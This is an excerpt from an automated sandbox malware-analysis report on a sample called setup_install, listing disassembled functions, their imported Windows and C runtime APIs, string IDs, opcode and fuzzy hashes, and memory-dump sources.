                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d9a609acbe2c02ee8f817ad6ad3c010615c764a0c0663b19b908496bcc8014fe
                                                                                                                            • Instruction ID: bacfe2c225414bb7ff0cdc02a810204ca1b5d5fdd3c3e01a984179b29378d877
                                                                                                                            • Opcode Fuzzy Hash: d9a609acbe2c02ee8f817ad6ad3c010615c764a0c0663b19b908496bcc8014fe
                                                                                                                            • Instruction Fuzzy Hash: 50F0C8B08541444AEB346E29A0C5373B7D09B4332CF0444BBDA441F247D63DCC958B9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041CA70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT(?,?,474E5543,?,004928A0,?,?,?,?,?,?,00495DDF,?,?,?,?), ref: 00496CB8
                                                                                                                            • abort.MSVCRT(?,?,474E5543,?,004928A0,?,?,?,?,?,?,00495DDF,?,?,?,?), ref: 00496CC5
                                                                                                                            • fwrite.MSVCRT ref: 00496D23
                                                                                                                            • fputs.MSVCRT ref: 00496D38
                                                                                                                            • fputc.MSVCRT ref: 00496D51
                                                                                                                            • abort.MSVCRT ref: 00496D5B
                                                                                                                            • free.MSVCRT ref: 00496D63
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort$fputcfputsfreefwrite
                                                                                                                            • String ID: what():
                                                                                                                            • API String ID: 3364258748-593870882
                                                                                                                            • Opcode ID: 5439cbb5731ecfb904189e1ef27f842915a51a62df35b8f92d01d9f87ca286b3
                                                                                                                            • Instruction ID: 02c67baed52dbf09691d4af760a4689ddd195310b7a63ab9331efcf8e9ed45fd
                                                                                                                            • Opcode Fuzzy Hash: 5439cbb5731ecfb904189e1ef27f842915a51a62df35b8f92d01d9f87ca286b3
                                                                                                                            • Instruction Fuzzy Hash: AA11F1B09147048ACB117FB6C04A26EBEE0EF45308F55892FE1C557242DB7D48819BAB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040F0F0 Relevance: 13.6, APIs: 9, Instructions: 82COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 39653677-0
                                                                                                                            • Opcode ID: 68a21049c92598d97cd3de43ea1451a522c10f2ebc1effc615357a532768408b
                                                                                                                            • Instruction ID: 27e5e2bf731c7e688b93df8dcd26155751fee027f353a1554e5d83245e2aa9b8
                                                                                                                            • Opcode Fuzzy Hash: 68a21049c92598d97cd3de43ea1451a522c10f2ebc1effc615357a532768408b
                                                                                                                            • Instruction Fuzzy Hash: 3C110571A14304CBC7349E69D48166BF3E0EFC8304F10893FE888AB741D639CC498B9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004103B0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 486COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID: cI
                                                                                                                            • API String ID: 2803490479-2783008204
                                                                                                                            • Opcode ID: 8d3363673ae844ae48bf6d245e9c0525a0f1e701d1696da634b0a2da91fa12b6
                                                                                                                            • Instruction ID: 5b7090af9efe01dbb2adcdbe8c6c049b43eba860465df0161bdb0c277862ac1d
                                                                                                                            • Opcode Fuzzy Hash: 8d3363673ae844ae48bf6d245e9c0525a0f1e701d1696da634b0a2da91fa12b6
                                                                                                                            • Instruction Fuzzy Hash: FA125A746087068FC710DF29C48069BB7E1BF88354F148A2EE99997351D7B8EDC5CB8A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004014E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                            • String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
                                                                                                                            • API String ID: 384173800-1835852900
                                                                                                                            • Opcode ID: f4794c7fe70eb898c9789f74c1687791ed503cf7786c7e5392dc4c08018eaef1
                                                                                                                            • Instruction ID: 4f362dc274160acc587cf35e5394c6cfc1ee227c5a0c5cc64635e2242b4b16bf
                                                                                                                            • Opcode Fuzzy Hash: f4794c7fe70eb898c9789f74c1687791ed503cf7786c7e5392dc4c08018eaef1
                                                                                                                            • Instruction Fuzzy Hash: 920192B08092409BC3007F79AD4811EBFF4AA50399F01853FE9899B261D7785488CBAF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00420EF0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 214stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp$strlen
                                                                                                                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                                                                                                                            • API String ID: 3738950036-1697194757
                                                                                                                            • Opcode ID: 05ff6ae18027b71db0fd3e5fd9d479bb262f6dbad4c3d4c09d2764051807020c
                                                                                                                            • Instruction ID: 19aa0cbdb30501e6efd708fb3d5dd07e617afbf83ab9df9d57f535cb34fb3ff8
                                                                                                                            • Opcode Fuzzy Hash: 05ff6ae18027b71db0fd3e5fd9d479bb262f6dbad4c3d4c09d2764051807020c
                                                                                                                            • Instruction Fuzzy Hash: 3E613871A093119FC710EF29D98481BFBE5EFD9784F54892EE48887321E375D8808B9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00429740 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 199stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp$strlen
                                                                                                                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                                                                                                                            • API String ID: 3738950036-1697194757
                                                                                                                            • Opcode ID: 88852d5c56fd3e2258574d7909f1a926856f0825713cd8b2fc04108aa9692d44
                                                                                                                            • Instruction ID: b1d14b8882606353f680edc6c859cc0b8a036287822566a72b6e09235bc3db2b
                                                                                                                            • Opcode Fuzzy Hash: 88852d5c56fd3e2258574d7909f1a926856f0825713cd8b2fc04108aa9692d44
                                                                                                                            • Instruction Fuzzy Hash: 02614871609315AFC700EF6AC98080ABBE5EEDA794F54C92EE48887311D375DC81CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040C5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 0040C5FF
                                                                                                                            • UnhandledExceptionFilter.KERNEL32 ref: 0040C60F
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0040C618
                                                                                                                            • TerminateProcess.KERNEL32 ref: 0040C629
                                                                                                                            • abort.MSVCRT ref: 0040C632
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                                            • String ID: @SN
                                                                                                                            • API String ID: 520269711-2401842898
                                                                                                                            • Opcode ID: bb94eab2e4b77e5c0e777a092fc88080959fd06cbe5c26c9a01e4e7304ef6f26
                                                                                                                            • Instruction ID: e3bed61ff18c17e6ea69789e2bc01e465f0acade019f61689ef629d8117a95a7
                                                                                                                            • Opcode Fuzzy Hash: bb94eab2e4b77e5c0e777a092fc88080959fd06cbe5c26c9a01e4e7304ef6f26
                                                                                                                            • Instruction Fuzzy Hash: 5A111CB4904744CFC700EF69E584609BBF0BB54308F41857DE9889B321E77899448F5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040C5AC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 0040C5FF
                                                                                                                            • UnhandledExceptionFilter.KERNEL32 ref: 0040C60F
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0040C618
                                                                                                                            • TerminateProcess.KERNEL32 ref: 0040C629
                                                                                                                            • abort.MSVCRT ref: 0040C632
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                                            • String ID: @SN
                                                                                                                            • API String ID: 520269711-2401842898
                                                                                                                            • Opcode ID: 5e9d0ddc63c0ce21adad266e0b183f364da33d10c9cd6786787efcddca7d788f
                                                                                                                            • Instruction ID: 29d447a8f6dfb6b1c230125c85a84983bced56336d55f275f7212d098b1c29bd
                                                                                                                            • Opcode Fuzzy Hash: 5e9d0ddc63c0ce21adad266e0b183f364da33d10c9cd6786787efcddca7d788f
                                                                                                                            • Instruction Fuzzy Hash: 9B111BB5900644CFC700EFB9E988609BBF0FB55308F418579E9849F322E7B89944CF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040F470 Relevance: 10.5, APIs: 7, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 625428f869ac6136c8c11b418eb690adec64885bd8c611c005dbda9376fb7b0c
                                                                                                                            • Instruction ID: 4320d7c54c2638f95505c4fecce27dd4fb56fd6553980e6baeab631c17662806
                                                                                                                            • Opcode Fuzzy Hash: 625428f869ac6136c8c11b418eb690adec64885bd8c611c005dbda9376fb7b0c
                                                                                                                            • Instruction Fuzzy Hash: 03F0A7F096414A06DA10DE9494C1376B6A09B53318F6814AAE9502F683D22D949ACA6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040F4C9 Relevance: 9.0, APIs: 6, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 5fff5b5ede55f9f5ba1db6d33e82b821f57946e7762714b59c24a352bd4ecc95
                                                                                                                            • Instruction ID: 7d0907f4945620f16c5f17bb15059163be2570b97087660edd9da54101569836
                                                                                                                            • Opcode Fuzzy Hash: 5fff5b5ede55f9f5ba1db6d33e82b821f57946e7762714b59c24a352bd4ecc95
                                                                                                                            • Instruction Fuzzy Hash: 4FF068B09542454AD614EF9DE091776FBA0BB82304F5414AEE9801B293D73C98D9CAEE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040BD10 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 344stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strlen
                                                                                                                            • String ID: _$_GLOBAL_
                                                                                                                            • API String ID: 39653677-1011282467
                                                                                                                            • Opcode ID: a2b663067ab9ac43eae1259b983d5d90bfdd602fc8824655fcab23b6e98a2371
                                                                                                                            • Instruction ID: 1652474c4c3c91be107882ee67e85ead9037580a51ec3bc2a28029a9bb66fa0b
                                                                                                                            • Opcode Fuzzy Hash: a2b663067ab9ac43eae1259b983d5d90bfdd602fc8824655fcab23b6e98a2371
                                                                                                                            • Instruction Fuzzy Hash: 11E18371D042198FEB21CF65C8903DEFBB2EF45304F1481AAD448AB386D7799A89CF95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040F8E0 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: pthread_once
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3286866217-0
                                                                                                                            • Opcode ID: 65b4c980ddf16fb2fbfa542c9ea5126be9a9b3ed16d813a07b2c59a976eb4d2a
                                                                                                                            • Instruction ID: 149a53d200872ed2bc288cff1e36da714d28f623b6469f3aa21c2f4d636f0fe0
                                                                                                                            • Opcode Fuzzy Hash: 65b4c980ddf16fb2fbfa542c9ea5126be9a9b3ed16d813a07b2c59a976eb4d2a
                                                                                                                            • Instruction Fuzzy Hash: CC113D7590021C9BCB24EF95C4819EEB7B4EF85304F10847AED497B342DA34AE4A8AE5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040C500 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 0040C539
                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 0040C54A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0040C552
                                                                                                                            • GetTickCount.KERNEL32 ref: 0040C55A
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 0040C569
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1445889803-0
                                                                                                                            • Opcode ID: e4e504cbeb7dc0e9d1787b92cfde487de46ec206016d29f7f655b4421b1fee98
                                                                                                                            • Instruction ID: 5ced306eeb1ec428656e43bad8b94c11001c7420c9fdbddf36b2a48547c10edc
                                                                                                                            • Opcode Fuzzy Hash: e4e504cbeb7dc0e9d1787b92cfde487de46ec206016d29f7f655b4421b1fee98
                                                                                                                            • Instruction Fuzzy Hash: F6119EB5A083408FC700EF79F88854BBBE0FB98354F454D3AE545CA720EB35E8488B86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040F980 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040EF40: pthread_once.LIBWINPTHREAD-1 ref: 0040EF8E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
